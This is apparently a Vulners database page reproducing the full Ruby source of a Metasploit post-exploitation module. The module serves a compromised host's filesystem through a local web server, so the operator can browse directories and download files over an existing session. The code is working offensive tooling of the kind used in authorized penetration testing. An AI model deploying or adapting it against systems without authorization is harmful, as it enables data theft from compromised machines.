Lucene search
K

Browse the session filesystem in a Web Browser

🗓️ 28 Oct 2021 17:51:28Reported by timwrType 
metasploit
 metasploit
🔗 www.rapid7.com👁 46 Views

Browse session filesystem in Web Browser. Allows browsing session filesystem via local browser window

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'cgi'

class MetasploitModule < Msf::Post

  include Msf::Post::File
  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Browse the session filesystem in a Web Browser',
        'Description' => %q{
          This module allows you to browse the session filesystem via a local
          browser window.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'timwr'],
        'Platform' => [ 'linux', 'win', 'osx' ],
        'SessionTypes' => [ 'meterpreter', 'shell', 'powershell' ],
        'DefaultOptions' => { 'SRVHOST' => '127.0.0.1' },
        'Notes' => {
          'Reliability' => [ ],
          'SideEffects' => [ ],
          'Stability' => [ CRASH_SAFE ]
        }
      )
    )
  end

  def run
    exploit
  end

  def primer
    uri = get_uri.chomp('/') + '/'
    current_dir = pwd
    if session.platform == 'windows'
      current_dir = current_dir.gsub('\\', '/')
    end
    print_status("Current directory: #{uri}#{current_dir}")
  end

  def list_path(file_path, uripath)
    contents = []
    if file_path == '/' && session.platform == 'windows'
      get_drives.each do |drive|
        driveurl = drive + ':/'
        furl = uripath + driveurl
        contents << [furl, driveurl]
      end
      return contents
    end

    base_url = uripath
    if file_path.starts_with?('/')
      base_url = base_url.chomp('/')
    end
    base_url += file_path.chomp('/') + '/'
    dir(file_path).each do |file|
      next if ['.', '..'].include?(file)

      furl = base_url + file
      contents << [furl, file]
    end
    contents
  end

  def handle_response(cli, request_uri)
    uripath = get_resource.chomp('/')

    # Convert http://127.0.0.1/URIPATH/file/ -> /file
    if request_uri != uripath && request_uri.starts_with?(uripath)
      file_path = request_uri[uripath.length, request_uri.length].chomp('/')
    end
    if file_path.blank?
      file_path = '/'
    end

    uripath += '/'

    # Convert /C: -> C:/
    if session.platform == 'windows'
      if file_path.starts_with?('/')
        file_path = file_path[1, file_path.length]
      end
      if /([A-Z]):$/ =~ file_path
        file_path += '/'
      end
    end
    if file_path.blank?
      file_path = '/'
    end

    print_status("Request uri: #{request_uri} file_path: #{file_path} from #{cli.peerhost}")
    root_dir = (file_path == '/')

    if file?(file_path) && !root_dir
      # Download the file
      data = read_file(file_path)
      send_response(cli, data, { 'Content-Type' => 'application/octet-stream', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' })
      return
    elsif directory?(file_path) || root_dir
      # List the directory
      body = "<h2>Directory listing for #{CGI.escapeHTML(file_path)}</h2><hr>"
      body << "<ul>\n"
      unless root_dir
        basedir = request_uri[0, request_uri.chomp('/').rindex('/')]
        if basedir.blank?
          basedir = '/'
        end
        body << "<li><a href=\"#{CGI.escapeHTML(basedir)}\">..</a>\n"
      end
      list_path(file_path, uripath).each do |furl, fname|
        body << "<li><a href=\"#{CGI.escapeHTML(furl)}\">#{CGI.escapeHTML(fname)}</a>\n"
      end
      body << "</ul>\n"
      html = %(<html>
  <head>
  <META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
  <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
  <title>Metasploit File Sharing</title>
  </head>
  <body>
  #{body}
  </body>
  </style>
  </html>
      )
      send_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' })
    else
      send_not_found(cli)
    end
  end

  def on_request_uri(cli, request)
    handle_response(cli, request.uri)
  rescue ::Rex::Post::Meterpreter::RequestError
    cli.send_response(create_response(500, 'Unknown error'))
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation